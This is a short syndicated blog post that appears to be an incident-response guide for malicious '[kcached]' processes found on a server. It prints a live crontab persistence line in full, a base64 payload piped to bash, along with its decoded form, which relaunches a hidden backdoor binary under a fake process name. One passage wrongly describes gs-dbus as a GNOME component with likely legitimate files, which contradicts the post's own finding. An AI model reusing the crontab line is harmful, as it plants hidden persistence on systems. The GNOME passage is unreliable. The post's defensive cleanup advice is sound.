This content originally appeared on DEV Community and was authored by Henri Sekeladi
https://alltime.pp.ua/blog/how-to-deal-with-malicious-kcached-processes/
If you find something like below on your server, be sure you’ve detected malicious activity.
username 2156075 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156076 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]
You can use the lsof command to determine which processes have the files open and whether they are being used for legitimate purposes. If you are unsure about the legitimacy of these files or the processes using them, it may be helpful to consult with a qualified system administrator or security expert.
root@server1 [~]# lsof -p 2156075
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156075 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156075 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156075 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus
Here you go:
ls -1 /home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus.dat
The files you see appear to be related to the gs-dbus process, which is a component of the GNOME software suite that manages D-Bus connections for graphical applications. The files in question are likely configuration files and data files used by this process.
It is not uncommon for these types of files to be owned by a user, especially if they are related to user-specific settings or configurations.
Inspect crontab of the given user:
root@server1 [~]# crontab -lu username
# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel
If you decode the base64 line you will see more:
/usr/bin/pkill -0 -U2438 gs-dbus 2>/dev/null || SHELL=/usr/local/cpanel/bin/noshell TERM=xterm-256color GS_ARGS="-k /home/username/.config/dbus/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/username/.config/dbus/gs-dbus'" 2>/dev/null
Recommendations:
– Don’t ignore the case
– kill the processes
– remove the files
– remove the cron
– reset all passwords for affected user
– scan account additionally using some good scanner
– notify the client
This content originally appeared on DEV Community and was authored by Henri Sekeladi
Henri Sekeladi | Sciencx (2024-09-10T02:06:53+00:00) How to deal with malicious kcached processes. Retrieved from https://www.scien.cx/2024/09/10/how-to-deal-with-malicious-kcached-processes/
Please log in to upload a file.
There are no updates yet.
Click the Upload button above to add an update.